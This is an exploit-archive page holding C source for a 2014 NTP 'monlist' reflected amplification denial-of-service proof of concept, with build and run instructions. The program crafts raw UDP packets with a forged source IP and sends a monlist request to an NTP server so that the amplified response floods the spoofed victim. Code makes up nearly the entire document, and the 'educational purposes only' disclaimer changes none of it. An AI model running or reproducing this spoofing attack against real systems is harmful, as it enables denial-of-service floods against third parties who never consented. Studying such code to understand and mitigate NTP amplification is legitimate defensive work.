NTP Spoofed "monlist query" Denial Of Service Proof Of Concept



EKU-ID: 3893 CVE: OSVDB-ID:
Author: Osborne Published: 2014-03-19 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


//   PROGRAM :   NTP_SPQUERY.c
//
//   AUTHOR :    loud-fat-bloke /   MARK OSBORNE
//
//   Description:
//
//    REFLECTED AMPLIFICATION NTP ATTACK
//
//    A well known security journal has asked me to do a piece on NTP ddos
//    and being a bit reactionary (OCD in other words)
//    I figured I would show that NTP and DNS DrdOS are related and conform to a common formulae. 
//    Therefore I have used the DNS_SPQUERY program I wrote 6 months ago to convert into NTP_SQUERY with minimal changes
//
//    NTP_SPQUERY.C is an "monlist query"  REFLECTED AMPLIFICATION NTP ATTACK that are common in March 2014
//
//
//   As part of the charity project
//                                 "CyberAttack CyberCrime CyberWarfare Cyber-Complacency"
//  
//   I have tried to use a book, youtube presentations, in person lectures and Android Apps to Highlight three key cyber points :
//   1 - that in europe a cyber attack by any group of proficient computer literate parties could cripple the infrastructure
//   2 - that formalised cyber security  monitoring is required to prevent this - not militaristic, counter espionage initiatives
//       which are hang overs from the cold ware
//   3 - Privacy campaigners generaly make things work by assuming "cyber security" monitoring fits into this
//       espionage initiatives describes above
//
//   charity project? -  proceeds from the book, the APPs and personal appearances go to medical charity for sepsis awareness
//
//
//  **** DO NO HARM WITH THIS PROGRAM *********
// 
//  the author has produced it for educational purposes only
//
//
/*   to build and run me  cut and paste the below 10 lines into your shell on a nice LINUX box
# compile  me
#
  gcc   ntp_spquery.c -o ntp_spquery
#
# run me                                                                                                     
#               SPOOFED_S_IP         NTP SERVER TARGET        
./ntp_spquery   192.168.0.121        192.168.0.120          
#
#
#
#
*/
char *pretty= "\n ---------------------------------------------------------------------------------- \n";
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>    
#include <string.h>        
#include <netdb.h>        
#include <sys/types.h>   
#include <sys/socket.h> 
#include <netinet/in.h>   
#include <netinet/ip.h>  
#include <netinet/udp.h>
#include <arpa/inet.h> 
#include <net/if.h>   
#include <sys/socket.h>
#include <syslog.h>
#include <netinet/in.h>
#include <stdio.h>
int udpsockfd,n;

#define PROGRAM    "NTP_SPQUERY"
 
 
//NTP header structure
struct NTP_HEADER
{
    unsigned short id; // identification number
 
    unsigned char li :2; //
    unsigned char vn :3; //
    unsigned char rb :1; //
    unsigned char eb :1; //
    unsigned char mb :1; //
    unsigned char opcode :5;
    unsigned char data[10] ; //
};
 
/*
char *pretyy= "\n \n DNS_SPQUERY - Amplification and Refelector  \n\n from the book 'CyberAttack CyberCrime CyberWarefare Cyber-Complacency \n\n";
*/
          
char *pretyy= "\n \n NTP_SPQUERY - Amplification and Refelector  \n\n from the book 'CyberAttack CyberCrime CyberWarefare Cyber-Complacency \n\n";
char *pretyz= " \tIs Hollywood's blueprint for Chaos coming true' by Mark Osborne\n \t ISBN-13: 978-1493581283 ISBN-10: 1493581287 \n\n";

unsigned char buf[4000];
int data_length ;                                           

/*


#  LeapIndicator = 0 , VersionNum = 3 or 2 , Mode = 3 (Client Mode)
#NTP v2 Monlist Request :
# data = "0x17,x00,x03,x2a,x00"
#NTP v3 Monlist Request :
# data = "0x1b,x00,x03,x2a,x00"
*/

// Define some constants.
#define IP4_HDRLEN 20         // IPv4 header length
#define UDP_HDRLEN  8         // UDP header length, excludes data

int
spoofudp (char *saddr,int sport, char *daddr, int   dport, int datalen,  char *udppacket)
{
  int   sd ;
  const int on = 1;
  struct ip iphdr, *iphdr_ptr;
  struct udphdr udphdr, *udphdr_ptr;
  unsigned char *data, *packet;
  struct sockaddr_in  sin;
  unsigned  char  x[10000];     // the buffer
//                                                  Allocate memory for various headers and offsets.
  packet       = x     ;
  iphdr_ptr = x     ;
//  datalen = dnslength;       
//  UDP header  ptr .
  udphdr_ptr =       (packet + IP4_HDRLEN);
//  UDP data ptr .
  data =  (packet + IP4_HDRLEN + UDP_HDRLEN);
//                                                  UDP data -copy it at the end
  memcpy (data  , udppacket ,datalen   );
// IPv4 header
  iphdr_ptr->ip_hl =5;
  iphdr_ptr->ip_v = 4;
  iphdr_ptr->ip_tos = 0;
  iphdr_ptr->ip_len = htons (IP4_HDRLEN + UDP_HDRLEN + datalen);
  iphdr_ptr->ip_id = htons (0);
  iphdr_ptr->ip_off = htons (0);
  iphdr_ptr->ip_ttl = 255;
  iphdr_ptr->ip_p = IPPROTO_UDP;
  iphdr_ptr->ip_dst.s_addr = inet_addr (daddr );         
  iphdr_ptr->ip_src.s_addr = inet_addr (saddr );     /* SPOOOOPH di source IP */
  iphdr_ptr->ip_sum = 0;  //kernel do this please

//                                                   UDP header
  udphdr_ptr->source = htons (sport);
  udphdr_ptr->dest = htons (dport);
  udphdr_ptr->len = htons (UDP_HDRLEN + datalen);
  udphdr_ptr->check = 0;                              // hey misterkernal do your job for me
//                                                   zero ise sockeet  data.
  memset (&sin, 0, sizeof (struct sockaddr_in));
  sin.sin_family = AF_INET;
  sin.sin_addr.s_addr = iphdr_ptr->ip_dst.s_addr;
//                                                   open a raw socket
  if ((sd = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
    perror ("socket() failed ");
    exit (2);
  }
// unless the socket is set with IP_HDRINCL a random IP datagram will go
// out on the wire  nearly all Linux kernals allow many bsd sun aix and hp dont
  if (setsockopt (sd, IPPROTO_IP, IP_HDRINCL, &on, sizeof (on)) < 0) {
    perror ("setsockopt() failed to set IP_HDRINCL ");
    exit (3);
  }
//                                                    Send packet.
  if (sendto (sd, packet, IP4_HDRLEN + UDP_HDRLEN + datalen, 0, (struct sockaddr *) &sin, sizeof (struct sockaddr)) < 0)  {
    perror ("sendto() failed ");
    exit (EXIT_FAILURE);
  }
// Close socket descriptor.
  close (sd);
}


usage ()
  {
  fprintf(stderr,"Program Usage: \n  %s   SOURCE_DOT_ADDR  DEST_DOT_ADDR  \n\n", PROGRAM);
  exit(1);
  }

unsigned char out[1000];
int len1 = 0, len2 = 0 ,len3 = 0   ;
int pants;
 
int
main( int argc , char *argv[])
  {
  char *out_temp;
  if ( argc != 3 )
     usage();
  /*                                                                                                                                    */             printf(pretyy ) ;
  /*                                                                                                                                    */             printf(pretyz ) ;
  printf(" Spoof Source ip: \t \t %s \n Dest ip: \t \t  %s \n \n \n ",   argv[1] ,
                   argv[2]                 );
//
memset(buf,0x00,0xfF);
sprintf(buf,"%c%c%c%c%c", 0x17,0x00,0x03,0x2a,0x00);

  data_length  = 9                   ;
  printf(pretty ) ;
//
//
// my pretty
  for (pants=0; pants < 30 ; pants++ )
    printf("%x ", buf[pants]);
//

  printf("\nNTP PACKET len \t \t %i \n" ,  data_length ) ;
//
//  Writes out a spoofed UDP Packet
//    written for my rfc 2827 survey which never got finished
//
  spoofudp (argv[1]        ,4950, argv[2]        , 123 ,  data_length, buf );
 
  return 0;
}